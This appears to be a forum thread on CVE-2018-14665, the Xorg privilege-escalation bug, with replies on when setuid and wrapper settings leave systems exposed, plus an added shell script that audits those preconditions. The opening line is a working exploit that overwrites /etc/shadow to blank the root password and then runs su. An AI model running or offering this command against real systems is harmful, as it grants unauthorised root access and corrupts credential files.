#CVE-2018-14665 - an LPE exploit via X.org fits in a tweet
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
To be fair, Xorg needs to be setuid for this to work, which it hasn't been for a while on most end-user distros. Server distros, like Red Hat/CentOS, are a different story.
On Arch, the /usr/lib/Xorg.wrap binary is setuid but it drops its privileges before calling execv on /usr/lib/Xorg (where the bug resides) and passes file descriptors so that it can do its job unprivileged. Problem completely mitigated unless you modify /etc/X11/Xwrapper.config.
It drops privileges in a supported environment including systemd-logind for handing out input device access and a driver supporting this. For example, it won't drop root with the nvidia driver.
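
The preconditions discussed in this thread (a setuid-root X server, or a setuid wrapper that keeps root) can be audited on a host with a short script. This is an added example, not part of the thread; the function names are hypothetical, the paths are the Arch ones quoted above, and `needs_root_rights` is the Xwrapper.config key documented in Xorg.wrap(1).

```shell
#!/bin/sh
# Added audit sketch; function names are hypothetical, not from the thread.

# Effective needs_root_rights from an Xwrapper.config ("auto" when unset).
wrapper_root_policy() {
    cfg=$1; val=auto
    if [ -r "$cfg" ]; then
        v=$(awk -F= '/^[ \t]*#/ { next }
            { gsub(/[ \t]/, "", $1); gsub(/[ \t]/, "", $2) }
            $1 == "needs_root_rights" { v = $2 }
            END { print v }' "$cfg")
        [ -n "$v" ] && val=$v
    fi
    printf '%s\n' "$val"
}

# Classify a binary as setuid-root, not-setuid, or missing.
setuid_state() {
    f=$1
    [ -e "$f" ] || { echo missing; return 0; }
    if [ -u "$f" ] && [ -n "$(find -L "$f" -prune -user 0 2>/dev/null)" ]; then
        echo setuid-root
    else
        echo not-setuid
    fi
}

# Combine both checks into one verdict line.
assess() {
    server=$1; wrapper=$2; cfg=$3
    s=$(setuid_state "$server"); w=$(setuid_state "$wrapper")
    p=$(wrapper_root_policy "$cfg")
    if [ "$s" = setuid-root ]; then
        echo "EXPOSED: $server is setuid root; update xorg-server or drop the bit"
    elif [ "$w" = setuid-root ] && [ "$p" = yes ]; then
        echo "EXPOSED: $cfg forces the wrapper to keep root"
    elif [ "$w" = setuid-root ] && [ "$p" = auto ]; then
        echo "REVIEW: wrapper decides at run time; root is kept if the driver/logind setup needs it"
    else
        echo "OK: no setuid-root path to the X server found"
    fi
}

assess /usr/lib/Xorg /usr/lib/Xorg.wrap /etc/X11/Xwrapper.config
```

On distributions that install the server elsewhere, pass that path to `assess` instead; a REVIEW result means the outcome depends on the driver and logind support described in the last reply.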